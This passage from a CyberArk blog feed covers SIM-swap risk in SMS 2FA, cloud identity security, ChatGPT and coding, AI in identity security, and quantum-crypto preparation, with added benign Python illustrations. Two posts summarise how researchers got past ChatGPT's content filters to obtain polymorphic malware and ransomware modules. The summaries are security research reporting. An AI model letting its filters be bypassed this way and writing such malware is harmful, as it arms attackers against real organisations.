I asked Thompson to break down major SMS authentication risks and why more organizations will likely follow in Twitter’s footsteps. Here’s what he had to say.

An “Any 2FA Method Is Better Than None” Philosophy Won’t Protect Your Data

As consumers, we have plenty of opportunities to switch on SMS 2FA (which requires both a password and code sent by text to our phones) to help protect banking, social media, email and other online accounts. “Using any kind of MFA method is arguably better than using a password alone when it comes to personal use,” Thompson says. “But that doesn’t mean SMS authentication can adequately protect your data, and it certainly isn’t workable for complex enterprises that need to secure access for employees, vendors, partners and clients.”

In fact, SMS is one of the least secure MFA methods out there today. “Thanks to SMS 2FA, virtually every organization has been hit with a subscriber identity module (SIM) swapping attack at one point or another,” he says.

SIM Swapping Is Alive and Well

In a typical SIM swap, a threat actor obtains a victim’s personal data using phishing techniques, then uses this information to convince a mobile carrier to switch the number associated with a SIM card to another unauthorized device. Criminals often employ social engineering to do this, though rogue insiders are sometimes convinced to help. After this “swap,” all calls and texts to the victim’s number are re-routed to the attacker’s phone. By sending a “forgot password” or account recovery request for any account linked to the phone number, the attacker can obtain an SMS 2FA code, then use it to log in, change the password and control the account.

SIM swapping has been around for a long time. In 2019, former Twitter CEO Jack Dorsey’s own Twitter account was hijacked via SIM swapping. The following year, a SIM-swapping gang stole more than $100 million by targeting celebrities and online influencers. In 2022, the U.S. Federal Bureau of Investigation (FBI) issued its own warning, citing a record number of SIM-swapping complaints to its Internet Crime Complaint Center (IC3).

SMS Authentication Isn’t Cost-effective or Easy to Use

Though organizations from the National Institute of Standards and Technology (NIST) to Google have warned against using SMS 2FA for years, it remains a popular authentication method. “This doesn’t make much sense when you stop and think about it,” Thompson says. “From an end user perspective, SMS authentication is pretty clunky and inconvenient.”

It’s also expensive. Twitter reportedly spent $60 million a year combatting SMS texts from fake bot accounts. What’s more, companies are typically charged a fee for every SMS code that’s sent. This can add up quickly. “While I can’t speak for the company, these seem like reasons enough to drop this MFA option for free users. If you want Twitter to continue to support the backend of an insecure feature, you gotta pay for it,” Thompson says.

There’s also the potential cost of a breach to consider. Since it takes two to SIM swap (meaning an individual and a mobile carrier get scammed), who’s ultimately responsible for the damage? Thompson points to a notable legal case involving $24 million in stolen bitcoin. This month, a California judge ruled that the telecom provider was not liable for punitive damages. “Identity-based threats are evolving rapidly,” says Thompson. “This case further underscores the need for organizations to rethink their legacy MFA approaches and adopt modern alternatives that are built to outpace attackers and protect critical assets.”

Organizations Need More Adaptive Ways to Verify Identities Based on Levels of Access, Privilege and Risk


So where can organizations go from here? What can be done, for instance, when a threat actor has an employee’s login credentials and a clone of their mobile device? “This is where phishing-resistant secondary authentication factors such as FIDO, QR codes, biometrics or physical tokens can make a big difference in thwarting attacks,” Thompson says. However, no MFA method is failsafe. He adds, “MFA fatigue attacks and other elaborate phishing schemes look for ways to bypass MFA of all kinds. And in these cases, the additional ability to analyze user behavior is critical for making smart, real-time access decisions.”

Unlike SMS 2FA, an adaptive MFA solution can learn from a user’s history of access habits, which enables it to discern typical behavior from risky activity. This allows the solution to ramp up or streamline authentication challenges based on real-time insights. The flexibility of this adaptive form of MFA provides a balance that takes care of job number one: protection. But it also prevents enhanced security measures from negatively impacting user experience.
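As an added illustration (not code from the original post or from CyberArk), the following Python sketch shows the mechanics of an adaptive decision like the one described above, and of the behavioral baselining mentioned in the insider-risk piece earlier in this feed: a per-user baseline is built from past logins, a new login attempt is scored against it, and the score selects allow, step-up or deny. The event fields, weights and thresholds are assumptions chosen for the example, and the login history is constructed.

```python
from dataclasses import dataclass, field
from datetime import datetime

# Constructed login history for one user: (ISO timestamp, device id, country).
# Assumption: the access log exposes at least these three fields per login.
HISTORY = [
    ("2023-03-01T08:05:00", "laptop-7f3a", "US"),
    ("2023-03-02T08:12:00", "laptop-7f3a", "US"),
    ("2023-03-03T17:48:00", "laptop-7f3a", "US"),
    ("2023-03-06T09:01:00", "phone-c21e", "US"),
    ("2023-03-07T08:30:00", "laptop-7f3a", "US"),
]


@dataclass
class Baseline:
    devices: set = field(default_factory=set)
    countries: set = field(default_factory=set)
    hours: set = field(default_factory=set)   # hours of day at which logins were seen


def build_baseline(events):
    """Learn what 'normal' looks like for this user from past logins."""
    b = Baseline()
    for ts, device, country in events:
        b.devices.add(device)
        b.countries.add(country)
        b.hours.add(datetime.fromisoformat(ts).hour)
    return b


def risk_score(baseline, ts, device, country, privileged):
    """Score one login attempt against the baseline. Weights are assumptions
    for the example; a real deployment would tune them from its own data."""
    score, reasons = 0, []
    if device not in baseline.devices:
        score += 40
        reasons.append("unknown device")
    if country not in baseline.countries:
        score += 40
        reasons.append("new country")
    hour = datetime.fromisoformat(ts).hour
    if not any(abs(hour - h) <= 1 for h in baseline.hours):   # allow an hour of slack
        score += 20
        reasons.append("unusual hour")
    if privileged:
        score += 20
        reasons.append("privileged account")
    return score, reasons


def decide(score):
    """Map the score to an authentication outcome (thresholds are assumptions)."""
    if score >= 80:
        return "deny"
    if score >= 40:
        return "step_up"       # challenge with a phishing-resistant second factor
    return "allow"             # familiar context: no extra prompt


def evaluate(baseline, ts, device, country, privileged=False):
    score, reasons = risk_score(baseline, ts, device, country, privileged)
    return decide(score), score, reasons


if __name__ == "__main__":
    base = build_baseline(HISTORY)
    print(evaluate(base, "2023-03-08T08:10:00", "laptop-7f3a", "US"))
    print(evaluate(base, "2023-03-08T03:00:00", "phone-9b0d", "RU", privileged=True))
```

The point of the design is the asymmetry: a login that matches the baseline gets no extra prompt at all, a single anomaly earns a step-up challenge rather than a refusal, and only a pile-up of anomalies is denied outright. That is what lets the control be stricter than SMS 2FA without training users to click through prompts.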

“MFA has come a long way,” Thompson says. Putting forth a bottom line, he adds, “Let’s hope Twitter’s decision to retire SMS authentication inspires others to take this important step toward a safer, more secure digital future.”

David Puner is a senior editorial manager at CyberArk. He hosts CyberArk’s Trust Issues podcast.

For more insights from Andy Thompson, check out his CyberArk Trust Issues podcast dive into the latest developments in the world of ransomware.

Cloud Identity Security: It Doesn’t Taste Like Chicken https://www.cyberark.com/blog/cloud-identity-security-it-doesnt-taste-like-chicken/ Tue, 18 Apr 2023 19:27:49 +0000 https://www.cyberark.com/?p=142948

There’s a scene in the original “Matrix” movie when Neo is sitting in the grimy kitchen with the rest of the crew and eating gray, runny slop. No matter what new version of gray slop they eat, they always seem to think that it tastes like chicken.

When confronted with something new, it’s a natural human trait to relate it back to something we already know. I’ve had friends who have grown up exclusively with Western cuisine try tofu and described it as tasting like chicken. If you were to ask my grandmother, who was born and raised in China, what tofu tasted like, she would probably give you a quizzical look and simply state that tofu tastes like tofu.

The problem with this tendency to compare something new to something we’re familiar with (like chicken) is that it can cause us to make a lot of false assumptions – for instance, you might assume tofu is animal-based rather than plant-based.

When we think about cloud Identity Security, we have to work hard to put aside our natural human tendency to instantly equate it with something we already know, or we could end up working off of those false assumptions. In the case of Identity Security, security teams may at first consider cloud to “taste like” the on-premises infrastructure that they’re used to. But cloud infrastructure is entirely different (think back to plant-based tofu versus animal-based chicken), and we must think about the cloud for what it is versus try to fit it in a box from our previous experience in order to design proper security controls. Otherwise, those false assumptions could lead to flawed security architectures and increase the risk of potential cyberattacks.

So let’s take a look at what cloud security is, instead of trying to relate it back to what has been done for on-premises infrastructure. Along the way, we’ll consider the two types of identities – human and non-human – since they each have vastly different access requirements.

The Great Identities Divide: Humans and Non-humans

Human identities (employees, vendors and maybe even customers) are relatively stable and well-known. Human scalability is limited; after all, there’s a limit to how fast a person can type or click. However, human access use cases vary greatly by role and circumstance. For instance, under normal circumstances, a developer may not be allowed access into a production environment, but if there’s an outage, the access level may be elevated to “read all/write all” to allow them to quickly traverse the entire environment to diagnose and resolve the issue. Human individuals can also assume different access roles for various reasons – an individual covering for a teammate out on paternity leave or transferring to another department or receiving a promotion.

Non-human identities (services, microservices or machine identities) are in many ways the polar opposite. Service containers and virtual machines (VMs) are highly dynamic and ephemeral through autoscaling. Service scalability can vary from thousands to extremes of millions of transactions per second. However, non-human service behaviors and access are highly programmatic and predictable. Services never have to cover for another service that has a family emergency, and, during an outage, the human’s task is to diagnose why some service or set of services isn’t behaving exactly like it’s supposed to.

These and many other differences drive us to think about securing the identity of human and non-human access very differently.

Human Cloud Access Considerations

The bottom box of the image below shows the three layers of a cloud environment that are within the control of an organization. The top box depicts SaaS applications in someone else’s cloud that are outside the organization’s control.

  • IN the cloud depicts all the native services that are provided by the cloud service providers (CSPs). Each of the three major CSPs now has hundreds of services and provides granular native controls for each of them. However, users typically hold standing (always-on) access and entitlements, which exposes the organization to a range of security issues. Companies with multi-cloud environments have compounded problems because they are managing access across multiple CSPs.
  • ON the cloud depicts workloads that organizations build and deploy on top of the CSP’s cloud. All CSPs preach a shared security model which puts the onus of securing workloads ON the cloud on the organization. These workloads could be wholly contained as a single service running in a container or an entire legacy application in a VM. These workloads take advantage of one of the core values of the cloud: elastic compute, which auto-scales fleets of instances up and down based on demand. However, this creates a problem for anyone who wants to peek inside a VM at any given moment to diagnose an issue because it’s impossible to laboriously register every ephemeral VM that comes and goes with a fixed access control list.
  • IN the VM ON the cloud describes a possible third layer that could range from a light Java app to a heavyweight legacy independent software vendor (ISV) application. Each of these workloads, of course, has its own security model.

Lastly, every organization uses SaaS applications, whether it be a business application or a technical application. The SaaS vendors each have their own security access method outside the control of the organization. However, the organization still has the need to monitor the activities of the admin for those SaaS apps in case of malicious activity.

Non-human Cloud Access Considerations

Non-human identities, on the other hand, typically use secrets to communicate to each other and to access critical resources. Secrets are credentials like passwords, API keys, SSH keys and the like. There are two sides of the coin when it comes to managing secrets in the cloud for non-human access.

On one side, organizations have to manage the secret itself. This means managing the myriad types of secrets (token, public/private keys, certificates and more) as well as industry or internal rules such as rotation intervals in order to stay in compliance. However, doing this in the cloud in a consistent manner becomes complicated in a multi-cloud environment and with the reality of open-source vaults.

On the other side of the coin, organizations must control access to the secrets, since these secrets are used by each target system to govern how each of the disparate systems talk to one another. A mishmash of control points spread out across each system is clearly inefficient and cumbersome. It’s obvious that a central hub to control access to the secrets is the most logical solution.
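To make the two sides of the coin concrete, here is an added example in Python (not CyberArk code, and not a description of any product) of a minimal central hub: every secret carries a rotation interval, the hub reports which secrets are overdue, and it releases a secret only to a workload identity named in that secret's policy, writing an audit record either way. The identity naming scheme, the policy shape and the sample secrets are assumptions constructed for the example.

```python
from datetime import datetime, timedelta


class SecretsHub:
    """Minimal central hub for non-human access to secrets.
    The policy shape (secret name -> allowed workload identities) and the
    identity naming scheme are assumptions made for this example."""

    def __init__(self, now):
        self.now = now          # injected clock so rotation checks are deterministic
        self._secrets = {}      # name -> {"value", "rotated_at", "max_age"}
        self._policy = {}       # name -> set of workload identities allowed to read it
        self.audit = []         # (identity, secret name, outcome)

    def put(self, name, value, max_age_days, allowed):
        self._secrets[name] = {"value": value, "rotated_at": self.now,
                               "max_age": timedelta(days=max_age_days)}
        self._policy[name] = set(allowed)

    def rotate(self, name, new_value):
        """Replace the value and restart the rotation clock."""
        self._secrets[name]["value"] = new_value
        self._secrets[name]["rotated_at"] = self.now

    def overdue(self):
        """Side one of the coin: which secrets have outlived their rotation interval."""
        return sorted(n for n, s in self._secrets.items()
                      if self.now - s["rotated_at"] > s["max_age"])

    def get(self, identity, name):
        """Side two: release a secret only to an identity named in its policy,
        and record every attempt so access can be audited in one place."""
        if name not in self._secrets:
            self.audit.append((identity, name, "unknown"))
            raise KeyError(name)
        if identity not in self._policy[name]:
            self.audit.append((identity, name, "denied"))
            raise PermissionError(f"{identity} is not allowed to read {name}")
        self.audit.append((identity, name, "granted"))
        return self._secrets[name]["value"]

    def advance(self, days):
        """Move the injected clock forward (used to exercise rotation checks)."""
        self.now += timedelta(days=days)


def can_read(hub, identity, name):
    """True if the hub releases the secret to this identity, False if it refuses."""
    try:
        hub.get(identity, name)
        return True
    except PermissionError:
        return False


def make_demo_hub():
    """Constructed sample: two workloads, two secrets with different rotation intervals."""
    hub = SecretsHub(now=datetime(2023, 4, 1))
    hub.put("db-password", "p@ss-v1", max_age_days=30, allowed=["k8s:payments/api"])
    hub.put("billing-api-key", "ak-v1", max_age_days=90,
            allowed=["k8s:payments/api", "k8s:payments/worker"])
    return hub


def rotation_demo(days=31):
    """Return (secrets overdue after `days`, secrets still overdue once those are rotated)."""
    hub = make_demo_hub()
    hub.advance(days)
    before = hub.overdue()
    for name in before:
        hub.rotate(name, f"{name}-rotated")
    return before, hub.overdue()


if __name__ == "__main__":
    hub = make_demo_hub()
    print(hub.get("k8s:payments/api", "db-password"))          # granted
    print(can_read(hub, "k8s:marketing/web", "db-password"))   # False: not in policy
    print(rotation_demo())                                      # (['db-password'], [])
    print(hub.audit)
```

Two design choices matter here. Access is keyed on the workload's identity rather than on which host it runs on, so autoscaled containers need no per-instance registration. And rotation state lives beside the secret in the hub, so compliance with a rotation interval is a single query over the hub instead of a survey of every consuming system.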

Secure Access to the Layers of the Cloud

Securing access to the cloud is challenging. As you build cloud security controls, make sure you don’t fall into the trap of equating it to on-premises infrastructure; remember, tofu tastes like tofu. Instead, consider a robust cloud Identity Security program that accounts for all of these layers of infrastructure independent of an on-premises mental model. A holistic pragmatic approach to improve cloud security will help both digital-native businesses and enterprises lifting and shifting legacy workloads secure access to the cloud for humans and non-humans.

To learn more about how you can take a phased approach to build a pragmatic cloud Identity Security program, check out my next piece, “Why Cloud Identity Security Seems So Hard.”

Charles Chu is the general manager of Cloud Security at CyberArk.

ChatGPT’s Role in the Evolution of Application Development https://www.cyberark.com/blog/chatgpts-role-in-the-evolution-of-application-development/ Tue, 11 Apr 2023 11:05:51 +0000 https://www.cyberark.com/?p=142794

When I wrote my first applications in high school, coding was a lot more time-consuming. I didn’t have libraries I could shop through with ready-made bits of code to drop in to save myself time or bridge the gap between the pieces of code I could write to create something more complex. Instead, I had to write everything from scratch. If I wanted to include any kind of image, I would have to draw it with mathematical coordinates, which took a ton of time. It’s almost like programming via Etch-a-Sketch. A friend of mine who spent hours creating a video game for a school project could only use stick figures, but our teacher thought the end product didn’t look very appealing, not realizing how much time and effort creating those stick figures took.

As I’ve moved forward in my career, other developers and I have been able to write more complex applications. Part of that was due to our growing expertise as we learned more. But part of that has also been thanks to the new technology that’s sprung up in the intervening years to make it easier to code faster and build more advanced applications than ever before. And now we’ve got the newest piece of technology here to help: ChatGPT and other AI-powered tools that can write simple blocks of code for developers, in whatever programming language they need.

But as these new tools are used more frequently and at a larger scale, there are important cybersecurity implications. Developers will need to be educated about cybersecurity best practices to ensure that the code produced by these AI-powered tools is secure and not accidentally introducing vulnerabilities. Instead of taking work away from developers, tools like ChatGPT will require them to learn new skillsets when it comes to cybersecurity – because at the end of the day, the human is the one accountable for the code, no matter what machine produces it.

The Evolution of Technology for Application Development

One of the things I love most about software development is that it’s in a constant state of evolution. As a developer, you’re always looking for ways to be more efficient and not write the same code twice – the old mantra of “don’t repeat yourself.” Humans have always tried to find ways to automate mundane, repeatable tasks. Just think of what solutions like TurboTax have done for tax season – just plug in a few pieces of data and boom, your taxes are done. From a developer’s perspective, when we’re able to take out that repetitive lower-level coding work, we can build better, more complex applications.

AI bots like ChatGPT aren’t the first piece of technology that has helped us do that. Instead, they’re merely the next step in the evolution of app development, building off what’s come before.

One of the first experiences I had with a tool that helped make my coding life easier so I could focus on higher-level tasks was WYSIWYG (“what you see is what you get,” pronounced “wiz-ee-wig”), which I started using as a developer at IBM. WYSIWYG is a type of low-code/no-code software that allows you to create and edit elements that you need while showing them to you in their final form. For instance, say I need a button for my app. Think about that high school example, where I had to map images out with mathematical coordinates. With a WYSIWYG tool, I can instead create the button in its final form and then tweak as I need to in the tool, resizing it or adding text. Meanwhile, in the background, it creates lines of code that I can then drop into whatever application I’m working on, but in the tool itself, I just see the button. What you see is what you get. You can see how a tool like that would make things easier for app developers. I could spend less time coding buttons and more time on advanced functionality.

Another step in the evolution of coding technology is something called object-oriented programming (OOP). With OOP, people write basic modules of an application (“objects”) that contain data and code. Then as a developer, I can pull multiple pre-written objects together to create my own application. This saves developers time from having to write the same thing over and over again. Instead, you can grab the right objects as you need them, drop them in and move on.

ChatGPT: No More Googling Required?

Before AI-powered tools like ChatGPT, if I were looking for how to write some code in a certain language to perform a particular task, I’d head to Google. There, I’d usually find numerous answers from forums like Stack Overflow, which I’d sift through. There might be multiple answers from different sources that I’d have to compare until I landed on the one I wanted to use.

But as you can see in the image below, with ChatGPT, I don’t have to sift through multiple answers. Instead, I specify the programming language I’m working in and what I need the code to do, and it will serve me up what it believes to be the best answer. You can see how this saves time for developers. ChatGPT can write the code out faster than humans can type, which means less code for you, the developer, to write. By saving you from the mundane “boilerplate” type of development work, ChatGPT frees up developers to focus on higher-level concepts. The result? More advanced apps and faster development cycles.

chatgpt coding language

There’s Always a Catch

Notice how I said ChatGPT serves up what it believes to be the best answer? Therein lies the catch for using an AI tool, and it’s the same challenge that comes with using any prebuilt code. Just because ChatGPT gives you one answer instead of the several you’d find by searching the old-fashioned way doesn’t necessarily mean it’s the best answer. This is a tool that’s still in the beta stage, after all. Developers should still evaluate and cross-check the code that ChatGPT serves up before using it in any application.

There are plenty of examples of breaches that started with someone copying over code and not checking it thoroughly. Think back to Heartbleed, a security bug in a popular library that exposed hundreds of thousands of websites, servers and other devices that used the code.

Because the library was so widely used, the thought was that, of course, someone had checked it for vulnerabilities. But instead, the vulnerability persisted for years, quietly used by attackers to exploit vulnerable systems.

And that is the darker side to ChatGPT: attackers also have access to the tool. While OpenAI has built some safeguards into the tool to prevent it from answering questions regarding problematic subjects like code injection, the CyberArk Labs team uncovered some ways in which the tool could be used to create polymorphic malware. Even if these types of activities are safeguarded against as OpenAI continues to refine the tool, attackers can still use it the same way regular developers can – to cut down on manual coding time and produce malicious code faster than they could before.

Always Verify

So, as with so much else in cybersecurity, the solution is to always verify. Developers will have to cross-check the code that ChatGPT provides against other sources to ensure there are no unintentional vulnerabilities or errors within it. Because machine-written code doesn’t pass through the peer review that hand-written code once did, developers have to take accountability for it. They will have to educate themselves on cybersecurity best practices and work with their security teams to ensure they can appropriately validate any machine-written code. At the end of the day, though these tools are helpful, the human using the tools is the one responsible for what is produced; the machine isn’t the one that will get sued or disciplined if something goes wrong and the organization is breached. But as long as developers take the time to evaluate the answers that ChatGPT provides and follow cybersecurity best practices, it and other AI-powered tools like it can help software development reach new heights.

John Walsh is a senior product marketing manager at CyberArk.

]]>
AI, ChatGPT and Identity Security’s Critical Human Element https://www.cyberark.com/blog/ai-chatgpt-and-identity-securitys-critical-human-element/ Thu, 06 Apr 2023 16:11:38 +0000 https://www.cyberark.com/?p=142741 Tech graphic of brain neurons

In 1999, a far-fetched movie about a dystopia run by intelligent machines captured our imaginations (and to this day, remains my favorite film). Twenty-four years later, the line between fact and fiction has all but vanished and the blockbuster hits much differently. Are we entering the Matrix? Are we already in it? Can anyone be sure?

While robot overlords haven’t materialized (yet), modern life is inseparable from artificial intelligence (AI) and machine learning (ML). Advanced technology works behind the scenes when we search Google, unlock our phones with our faces, shop for “recommended items” online or avoid traffic jams with our trusty travel apps. AI/ML’s role in personal and professional life has expanded rapidly in recent years but it wasn’t until ChatGPT arrived in November 2022 that we reached a tipping point.

The New York Times’ Thomas L. Friedman describes the AI chatbot’s impact as “Promethean,” comparing this moment in history to when Dorothy enters the magical Land of Oz and experiences color for the first time in “The Wizard of Oz.” He writes that ChatGPT is “such a departure and advance on what existed before that you can’t just change one thing, you have to change everything.” For better and for worse.

In the Fifth Domain of Cyberspace, AI/ML Benefits Both Sides

My own AI “ah-ha moment” happened at DEFCON 24 back in 2016 as I watched autonomous cyber reasoning systems (CRSs) go head-to-head with each other, finding hidden vulnerabilities in code and deploying patches to fix them without any human assistance. It was clear that AI/ML would fundamentally change the way organizations did cybersecurity. Since then, we’ve experienced game-changing innovations that enable us to analyze massive quantities of data and accelerate response times.

Most important, AI/ML-fueled scalability, speed and continuous self-learning are a boon to resource-strained cybersecurity teams. As 3.4 million global industry jobs remain vacant, many security leaders welcome new opportunities to bridge gaps and amplify efforts. For instance, many are turning to AI-powered tools to simplify cumbersome authentication processes. Adaptive multi-factor authentication and single sign-on methods use behavioral analytics to verify identities based on levels of access, privilege and risk – without slowing users down. And as hybrid and multi-cloud environments continue to grow in complexity, teams are automatically managing permissions for the thousands (or even millions) of identities across their cloud estates with the help of AI.

ChatGPT is another valuable tool in defenders’ toolboxes. According to research from The Wall Street Journal, security teams have charged ChatGPT with creating easy-to-understand communications materials that resonate with business stakeholders and help build program support. Others use it to create policy templates that humans can customize. But most early ChatGPT cybersecurity use cases focus on task automation, from log file analysis and threat trend mapping to vulnerability detection and secure coding support for developers.

While AI continues to evolve, it has limitations, and it cannot bring the cognitive reasoning, nuance and critical first-hand experience that human subject matter experts can. For instance, a University of California, Los Angeles neuroscientist recently asked ChatGPT’s latest version, ChatGPT-4, “What is the third word of this sentence?” The bot’s answer was “third.” Another example: SC Magazine featured a study of 53,000 email users in more than 100 countries, revealing that phishing emails created by professional red teamers drove a 4.2% click rate compared to ChatGPT-created campaigns that lagged at just 2.9%.

In a recent ABC News interview, Sam Altman, CEO of OpenAI (the company that created ChatGPT), urged people to view the chatbot as a supplementary tool rather than a replacement for human experts, saying that “humanity has proven that it can adapt wonderfully to major technological shifts.”

Research on GPT by BlackBerry

Unfortunately, threat actors are also adapting and harnessing AI/ML for many of the same reasons cybersecurity teams are.

Threat researchers have already exposed numerous ways ChatGPT could be used for nefarious purposes. Our own CyberArk Labs team demonstrated how easy it is to create polymorphic malware – sophisticated malware that can evade security protections and make mitigation difficult – utilizing ChatGPT. CyberArk researchers found ways to circumvent built-in content filters (checks designed to prevent abuse and malicious activity) by experimenting with creative prompts. They coaxed ChatGPT into generating (and continuously mutating) code for injection, as well as creating file searching and encryption modules needed to spread ransomware and other malicious payloads. They also discovered that by using ChatGPT’s API with a specific prompt they could bypass all content filters completely.

Fellow researchers at Check Point Research analyzed several underground communities to discover ChatGPT use cases for creating infostealer malware, designing a multi-layered encryption tool (without any prior experience, according to the threat actor’s description) and launching an automated dark web marketplace for illicit goods.

In the previously mentioned interview, Altman acknowledged the risks that fast-morphing AI/ML technology brings. “I’m particularly worried that these models could be used for large-scale disinformation,” he said. “Now that they’re getting better at writing computer code, [they] could be used for offensive cyberattacks.”

IT decision-makers share Altman’s concerns. According to a 2023 BlackBerry Global Research study, 51% believe a successful cyberattack will be credited to ChatGPT within the year. Most concerning to respondents is the chatbot’s ability to aid threat actors in crafting more believable and legitimate-sounding phishing emails (53%). This highlights the need for robust endpoint security that encompasses everything from strong endpoint privilege management to regular cybersecurity awareness training to help end-users spot common phishing and social engineering tricks. Respondents also expressed worry that less-experienced attackers could use AI to improve their knowledge and skills (49%) and about AI spreading disinformation (49%).

AI apprehension continues to mount. In late March, an open letter featuring more than 1,100 prominent signatories called for “all AI labs to immediately pause for at least 6 months the training of AI systems more powerful than GPT-4” until regulators can catch up. Just two days after the letter was published, Italy temporarily banned ChatGPT and is now investigating potential violations of both the EU’s General Data Protection Regulation and the Italian Data Protection Code. In many other countries, lawmakers are sounding the alarm about emerging security and privacy issues. According to NPR, the Center for AI and Digital Policy filed a complaint with the U.S. Federal Trade Commission in late March describing ChatGPT-4 as having the ability to “undertake mass surveillance at scale.”

Identity Security’s Critical Human Element

As public debate and regulatory scrutiny around AI/ML intensify, enterprise cybersecurity teams should stay vigilant without losing sight of the bigger picture. That is: cyberattacks are inevitable – no matter how, where or why they originate. But damage is not.

Organizations can protect what matters most by securing all identities throughout the cycle of accessing any resource across any infrastructure. Doing so requires a holistic approach that unifies visionary technology and human expertise. The right Identity Security platform must protect critical data and systems against myriad threats to confidentiality, integrity and availability. The right Identity Security partner must be a trusted advisor, elevating security teams and strategies in ways technology cannot. Vision, experience, divergent thinking, technical acumen, empathy, high-touch support, ethical rigor, strong relationships, proven results – humanity in cybersecurity matters.

As AI/ML capabilities rapidly expand, our cybersecurity community must keep testing and pushing the limits of AI, sharing information and advocating for important guardrails. To echo Friedman’s words, only by working together can we “define how we get the best and cushion the worst of AI.”

Andy Thompson is CyberArk Labs’ Research Evangelist

]]>
Quantum Computing Is Coming… Here are 4 Ways to Get Ready https://www.cyberark.com/blog/quantum-computing-is-coming-here-are-4-ways-to-get-ready-2/ Mon, 03 Apr 2023 19:11:24 +0000 https://www.cyberark.com/?p=142399 Digital data flow

Ask a cybersecurity professional what keeps them up at night and you’ll get answers about insufficient staffing, IT complexity or constant attacks on their business. Quantum computing isn’t likely to make the list. Yet as technological change accelerates, real quantum risks are coming into view. Now is the time to prepare corporate IT systems for the “death” of classic cryptography to safeguard data and privacy in the future.

What is Quantum Computing?


Quantum computing isn’t just the stuff of science fiction. Physicists and engineers around the world have dedicated their life’s work to building a completely new type of computer. Once operational, quantum computers promise to unleash a new wave of innovation to solve some of the world’s greatest problems – from eradicating diseases with lifesaving drugs to safeguarding citizens through enhanced weather and traffic modeling.

Small-scale quantum applications, heavy investment activity and heightened government attention all signal progress on the quantum computing front. But building a large-scale general purpose quantum computer – the holy grail – remains an elusive engineering feat. It’s difficult to gauge exactly where things stand since most quantum research remains under wraps. However, many experts agree commercialized quantum computing will be here within the next two decades. Five manufacturers have even put stakes in the ground by promising fault-tolerant quantum-computing hardware by 2030.

Reimagining Public-Key Cryptography for the Post-Quantum World


Today, though we don’t give it much thought, we rely heavily on protocols such as TLS to secure our digital connections as we access email, bank accounts, mobile apps and virtually everything else on the internet. These protocols use various cryptographic building blocks to transmit information securely. Cryptography relies on hardness assumptions, which prevent anyone without the decryption keys from decrypting our data. But these assumptions will only hold until the first large-scale quantum computer arrives, one powerful enough to run algorithms that break these assumptions within hours – something all of today’s computers combined couldn’t do in a billion years. When this happens, all the digital information transmitted over the internet – today and in the future – could become vulnerable.

Algorithms published back in the mid-1990s, including Shor’s Algorithm and Grover’s Algorithm, signaled quantum computers’ potential to break modern encryption. These quantum algorithms are just waiting on hardware that’s built with enough processing power to run them.

Recognizing these risks, the U.S. National Institute of Standards and Technology (NIST) initiated a process in 2016 to “solicit, evaluate and standardize one or more quantum-resistant public-key cryptographic algorithms” and ultimately deliver an accessible, secure post-quantum communications method. In July 2022, NIST unveiled the first four quantum-resistant encryption algorithms. But as with every standardization push, the process takes rigor and time – about two more years until the standard is finalized, according to NIST’s estimate.

Meanwhile, the Biden administration is one of many governments that’s taking quantum computing risks seriously. In December 2022, the president signed the Quantum Computing Cybersecurity Preparedness Act, calling for federal agencies to run cryptography mapping by May 2023 in preparation for the transition to NIST-approved cryptographic algorithms. Just a few months prior in September 2022, the U.S. National Security Agency (NSA) outlined requirements for owners, operators and vendors of national security systems (NSS) to start using post-quantum algorithms by 2035.

Four Steps to Get Quantum Ready

While these efforts mark important progress, we still face a long, winding road to post-quantum cryptography adoption. Just consider that it’s taken almost 20 years to deploy modern public key cryptography infrastructure.

Whether your organization ultimately chooses to use an existing quantum-resistant algorithm or wait for a definitive standard to be published, replacing today’s methods will be challenging. While it may seem like quantum computing is light-years away, the time to start preparing for a transition – along with many other post-quantum business realities – is now. As you keep an eye on emerging government requirements and standardization milestones, here are four steps you can take:

1.  Know your crypto. This may sound obvious, but cryptography is so ingrained in our systems, applications and devices that many organizations don’t even know which algorithms they’re running. Step one is to find out.

2.  Inventory your data. Focus on your most critical assets first – especially sensitive datasets with a long shelf life. Ask yourself: What are the consequences of someone getting their hands on this encrypted data today and decrypting it in ten years? The answer to this question will significantly affect the migration plan in terms of priority and timetables.

3.  Map your crypto connections. Create a map of each corporate system using cryptography, and what data exists within each system. This will help you identify the riskiest areas of post-quantum vulnerability. As previously mentioned, switching cryptography algorithms will be a process. Fortunately, most organizations won’t have to make a massive switch all at once. Many datasets will not require quantum-safe security methods right off the bat.

4.  Make a plan. Use your learnings from steps 1-3 to start developing a cryptographic transition plan that encompasses other cybersecurity and data privacy standards that may need to be updated, along with steps for hardening existing security systems and processes. It’s important to note that prioritizing one system over another for cryptographic transition highly depends on organizational functions, goals and needs. The European Telecommunications Standards Institute (ETSI) and U.S. Department of Homeland Security offer detailed guidance and prioritization considerations for this.
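The four steps above can be turned into a small inventory and prioritization tool. What follows is an added example written for this post, not CyberArk’s own tooling: the inventory, the ten-year planning horizon and the 128-bit target strength are assumptions, and the quantum-safe list is the four schemes NIST selected in July 2022.

```python
from dataclasses import dataclass
from typing import List, Tuple

# Public-key schemes whose hardness assumptions (factoring, discrete log)
# fall to Shor's algorithm on a large enough quantum computer.
BROKEN_BY_SHOR = {
    "RSA-2048", "RSA-3072", "RSA-4096", "DH-2048",
    "ECDH-P256", "X25519", "ECDSA-P256", "Ed25519",
}

# Symmetric ciphers and hashes: Grover's algorithm gives a quadratic
# speed-up on brute-force search, roughly halving the effective bits.
SYMMETRIC_BITS = {
    "AES-128": 128, "AES-192": 192, "AES-256": 256,
    "ChaCha20": 256, "SHA-256": 256, "SHA-384": 384,
}
MIN_POST_QUANTUM_BITS = 128  # assumption: target strength after Grover

# The four schemes NIST selected for standardization in July 2022.
PQ_SAFE = {"CRYSTALS-Kyber", "CRYSTALS-Dilithium", "FALCON", "SPHINCS+"}

# Assumption: planning horizon for harvest-now-decrypt-later risk, taken
# from the post's "decrypting it in ten years" question.
HORIZON_YEARS = 10

SEVERITY = {"safe": 0, "weakened": 1, "unknown": 2, "broken": 3}


def classify_algorithm(alg: str) -> str:
    """Step 1 (know your crypto): label one algorithm's quantum exposure."""
    if alg in BROKEN_BY_SHOR:
        return "broken"
    if alg in PQ_SAFE:
        return "safe"
    if alg in SYMMETRIC_BITS:
        effective_bits = SYMMETRIC_BITS[alg] // 2
        return "safe" if effective_bits >= MIN_POST_QUANTUM_BITS else "weakened"
    return "unknown"  # not in the inventory yet: step 1 says find out


@dataclass
class System:
    name: str
    algorithms: List[str]
    sensitivity: int        # 1 (public data) .. 5 (crown jewels)
    shelf_life_years: int   # how long the data must stay confidential


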